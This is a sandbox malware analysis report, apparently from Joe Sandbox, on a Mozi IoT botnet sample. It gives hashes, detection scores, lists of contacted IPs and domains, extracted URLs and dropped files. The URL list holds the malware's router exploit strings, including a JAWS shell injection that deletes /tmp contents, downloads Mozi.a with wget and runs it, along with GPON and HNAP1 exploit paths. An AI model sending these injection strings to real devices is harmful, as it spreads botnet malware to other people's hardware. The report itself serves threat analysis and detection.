Mozi.m.3

Status: finished

Submission Time: 2022-01-28 13:56:42 +01:00

Malicious

Spreader

Trojan

Evader

Mirai

Comments

Details

Analysis ID:
562113
API (Web) ID:
929635
Analysis Started:

2022-01-28 13:56:42 +01:00
Analysis Finished:

2022-01-28 14:05:47 +01:00
MD5:
eec5c6c219535fba3a0492ea8118b397
SHA1:
292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:
12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Technologies:

Engines
IOCs

Joe Sandbox

Engine	Download Report	Detection	Info
	Full Report Management Report IOC Report	malicious Score: 100	System: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)

Third Party Analysis Engines

Open Full Report

malicious

Score: 32/49

Open Full Report

malicious

Score: 24/35

malicious

Score: 21/28

malicious

IPs

IP	Country	Detection
142.78.223.105	Canada
149.31.223.0	United States
47.85.193.136	United States
Click to see the 97 hidden entries
185.79.226.70	Portugal
23.232.144.253	Japan
62.111.242.61	Poland
60.50.120.207	Malaysia
164.251.226.208	United States
173.94.112.119	United States
53.114.83.124	Germany
35.89.206.91	United States
95.240.239.88	Italy
218.39.19.65	Korea Republic of
156.4.225.43	United States
220.71.153.167	Korea Republic of
167.110.204.224	United States
182.170.213.106	Japan
43.126.201.126	Japan
39.147.161.154	China
177.249.12.60	Mexico
104.100.148.229	United States
166.106.1.246	unknown
202.222.4.253	Japan
35.60.164.149	United States
68.136.209.119	United States
211.4.101.192	Japan
169.137.244.247	United States
198.145.227.220	United States
39.38.182.96	Pakistan
93.13.215.74	France
34.186.100.193	United States
135.26.138.61	United States
152.114.122.105	United Kingdom
103.59.2.142	India
173.167.216.78	United States
194.97.213.242	Germany
165.41.240.146	United States
217.232.11.98	Germany
163.8.68.103	Australia
16.65.114.156	United States
220.205.132.232	China
20.238.169.86	United States
185.8.253.105	France
4.110.94.140	United States
32.174.73.232	United States
205.95.125.90	United States
130.68.103.209	United States
40.91.248.26	United States
11.230.142.52	United States
205.4.238.39	United States
113.129.113.246	China
4.171.59.186	United States
147.16.72.64	United States
80.59.253.0	Spain
98.245.32.216	United States
53.248.69.159	Germany
23.11.203.232	United States
218.72.91.66	China
44.87.205.17	United States
143.49.171.154	United States
145.55.9.226	United Kingdom
67.148.51.196	United States
135.192.237.245	United States
37.78.209.154	Russian Federation
208.115.182.29	United States
1.185.181.124	China
39.99.69.81	China
24.219.254.49	United States
130.114.149.2	United States
91.6.191.105	Germany
208.252.73.84	United States
37.133.231.78	Spain
185.239.176.62	Iraq
94.149.105.110	Denmark
117.207.90.45	India
139.112.91.231	Norway
175.244.101.90	Korea Republic of
172.206.179.220	United States
44.53.23.174	United States
154.62.137.64	United States
222.196.0.53	China
95.179.227.24	Netherlands
204.228.101.40	United States
154.123.11.110	Kenya
48.63.209.77	United States
204.180.37.241	United States
16.76.8.99	United States
170.145.194.147	United States
124.109.183.90	Japan
149.196.235.159	United Kingdom
6.11.213.232	United States
41.29.160.34	South Africa
124.225.149.1	China
69.103.186.241	United States
159.229.74.191	United States
57.219.0.139	Belgium
162.4.117.204	unknown
86.15.234.71	United Kingdom
124.13.95.167	Malaysia
142.94.252.227	Canada

Domains

Name	IP	Detection
dht.transmissionbt.com	87.98.162.88
bttracker.acc.umu.se	130.239.18.158
router.bittorrent.com	67.215.246.10
Click to see the 2 hidden entries
router.utorrent.com	82.221.103.244
bttracker.debian.org	0.0.0.0

URLs

Name	Detection
http://104.25.119.143:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://205.198.160.107:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://1.9.218.126:80/HNAP1/
Click to see the 51 hidden entries
http://23.58.36.209:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:80/GponForm/diag_Form?images/
http://23.6.123.60:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://178.32.54.199:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://81.108.37.251:80/HNAP1/
http://114.142.213.80:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://188.215.82.71:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://148.229.1.12:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://54.173.33.241:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://93.41.229.147:80/HNAP1/
http://162.209.132.128:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://186.219.131.213:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://23.57.42.173:80/HNAP1/
http://23.1.122.127:80/HNAP1/
http://%s:%d/bin.sh;chmod
http://13.35.5.125:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://%s:%d/bin.sh
http://23.44.16.109:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://154.209.180.104:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://171.25.175.236:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://87.17.124.195:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://%s:%d/Mozi.m;/tmp/Mozi.m
http://%s:%d/Mozi.m
http://www.pastebin.ca
http://purenetworks.com/HNAP1/
http://www.pastebin.ca/upload.php
http://git.kernel.org/cgit/utils/kernel/kmod/kmod.git/commit/libkmod/libkmod-module.c?id=fd44a98ae2e
http://www.alsa-project.org.
http://154.93.41.99:37215/ctrlt/DeviceUpgrade_1
http://HTTP/1.1
http://schemas.xmlsoap.org/soap/envelope/
http://%s:%d/Mozi.m;$
http://schemas.xmlsoap.org/soap/envelope//
http://%s:%d/Mozi.a;chmod
http://ipinfo.io/ip
http://%s:%d/Mozi.m;
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://www.alsa-project.org/cardinfo-db/
http://127.0.0.1sendcmd
http://121.151.98.14:80/HNAP1/
http://www.alsa-project.org
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
http://127.0.0.1
http://pastebin.ca)
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://schemas.xmlsoap.org/soap/encoding/
http://www.pastebin.ca.
http://%s:%d/Mozi.a;sh$
http://www.alsa-project.org/alsa-info.sh

Dropped files

Name	File Type	Hashes
/etc/init.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/etc/profile.d/cedilla-portuguese.sh	ASCII text	#
/etc/profile.d/bash_completion.sh	ASCII text	#
Click to see the 97 hidden entries
/etc/profile.d/apps-bin-path.sh	ASCII text	#
/etc/profile.d/Z99-cloudinit-warnings.sh	ASCII text	#
/etc/profile.d/Z99-cloud-locale-test.sh	ASCII text	#
/etc/profile.d/Z97-byobu.sh	ASCII text	#
/etc/profile.d/01-locale-fix.sh	ASCII text	#
/etc/init.d/keyboard-setup.sh	ASCII text	#
/etc/init.d/hwclock.sh	ASCII text	#
/etc/init.d/console-setup.sh	ASCII text	#
/usr/bin/rescan-scsi-bus.sh	ASCII text	#
/usr/networks	ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped	#
/etc/profile.d/gawk.sh	ASCII text	#
/etc/profile.d/im-config_wayland.sh	ASCII text	#
/etc/profile.d/vte-2.91.sh	ASCII text	#
/etc/profile.d/xdg_dirs_desktop_session.sh	ASCII text	#
/etc/rcS.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/usr/bin/gettext.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh	ASCII text	#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh	ASCII text	#
/usr/share/doc/netcat-openbsd/examples/dist.sh	ASCII text	#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh	ASCII text	#
/usr/share/doc/python3-colorama/examples/demo.sh	ASCII text	#
/usr/share/doc/python3-serial/examples/port_publisher.sh	ASCII text	#
/usr/share/doc/sg3-utils/examples/sg_persist_tst.sh	ASCII text	#
/usr/share/doc/git/contrib/git-resurrect.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh	ASCII text	#
/usr/share/doc/git/contrib/vscode/init.sh	ASCII text	#
/usr/share/doc/git/contrib/update-unicode/update_unicode.sh	ASCII text	#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/git-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/rerere-train.sh	ASCII text	#
/usr/share/doc/git/contrib/remotes2config.sh	ASCII text	#
/usr/share/doc/gawk/examples/prog/igawk.sh	awk or perl script, ASCII text	#
/usr/src/linux-headers-5.4.0-81/Documentation/features/list-arch.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/arch/arm64/boot/install.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/arch/arm/tools/syscalltbl.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/arch/arm/tools/syscallnr.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/arch/arm/tools/syscallhdr.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/arch/arm/boot/install.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/arch/arm/boot/deflate_xip_data.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/Documentation/sound/cards/multisound.sh	C source, ASCII text	#
/usr/src/linux-headers-5.4.0-81/Documentation/s390/config3270.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/Documentation/features/scripts/features-refresh.sh	ASCII text	#
/usr/share/doc/xdotool/examples/ffsp.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/Documentation/arm64/kasan-offsets.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/Documentation/admin-guide/aoe/udev-install.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/Documentation/admin-guide/aoe/status.sh	ASCII text	#
/usr/src/linux-headers-5.4.0-81/Documentation/admin-guide/aoe/autoload.sh	ASCII text	#
/usr/share/vim/vim81/macros/less.sh	ASCII text	#
/usr/share/session-migration/scripts/01-usd-migration-monitors-xml.sh	ASCII text	#
/usr/share/os-prober/common.sh	ASCII text	#
/usr/share/lightdm/guest-session/setup.sh	ASCII text	#
/usr/share/hplip/hplip_clean.sh	ASCII text	#
/etc/wpa_supplicant/action_wpa.sh	ASCII text	#
/usr/share/cups/braille/index.sh	ASCII text	#
/usr/share/cups/braille/cups-braille.sh	ASCII text, with CR, LF line terminators	#
/usr/share/brltty/initramfs/brltty.sh	ASCII text	#
/usr/share/alsa/utils.sh	ASCII text	#
/usr/share/alsa-base/alsa-info.sh	ASCII text, with very long lines	#
/usr/share/PackageKit/helpers/test_spawn/search-name.sh	ASCII text	#
/tmp/.config	ASCII text	#
/etc/wpa_supplicant/ifupdown.sh	ASCII text	#
/etc/wpa_supplicant/functions.sh	ASCII text	#
/usr/share/cups/braille/indexv3.sh	ASCII text	#
/etc/gdm3/config-error-dialog.sh	ASCII text	#
/etc/console-setup/cached_setup_terminal.sh	ASCII text	#
/etc/console-setup/cached_setup_keyboard.sh	ASCII text	#
/etc/console-setup/cached_setup_font.sh	ASCII text	#
/etc/acpi/undock.sh	ASCII text	#
/etc/acpi/tosh-wireless.sh	ASCII text	#
/etc/acpi/ibm-wireless.sh	ASCII text	#
/etc/acpi/asus-wireless.sh	ASCII text	#
/etc/acpi/asus-keyboard-backlight.sh	ASCII text	#
/usr/share/doc/gawk/examples/network/PostAgent.sh	ASCII text	#
/usr/share/doc/git/contrib/diff-highlight/t/t9400-diff-highlight.sh	ASCII text	#
/usr/share/doc/git/contrib/credential/netrc/t-git-credential-netrc.sh	ASCII text	#
/usr/share/doc/git/contrib/coverage-diff.sh	ASCII text	#
/usr/share/doc/gdb/contrib/words.sh	ASCII text	#
/usr/share/doc/gdb/contrib/gdb-add-index.sh	ASCII text	#
/usr/share/doc/gdb/contrib/expect-read1.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh	ASCII text	#
/boot/grub/i386-pc/modinfo.sh	ASCII text	#
/usr/share/doc/git/contrib/fast-import/git-import.sh	ASCII text	#
/usr/share/doc/cron/examples/cron-tasks-review.sh	ASCII text	#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh	ASCII text	#
/usr/share/doc/bubblewrap/examples/flatpak-run.sh	ASCII text	#
/usr/share/doc/bubblewrap/examples/bubblewrap-shell.sh	ASCII text	#
/usr/share/doc/acpid/examples/powerbtn.sh	ASCII text	#
/usr/share/doc/acpid/examples/default.sh	ASCII text	#
/usr/share/doc/acpid/examples/ac.sh	ASCII text	#
/usr/share/debconf/confmodule.sh	ASCII text	#
/usr/share/cups/braille/indexv4.sh	ASCII text	#

Mozi.m.3

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

Domains

URLs

Dropped files

Mozi.m.3 Options

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

Domains

URLs

Dropped files

Search started

Mozi.m.3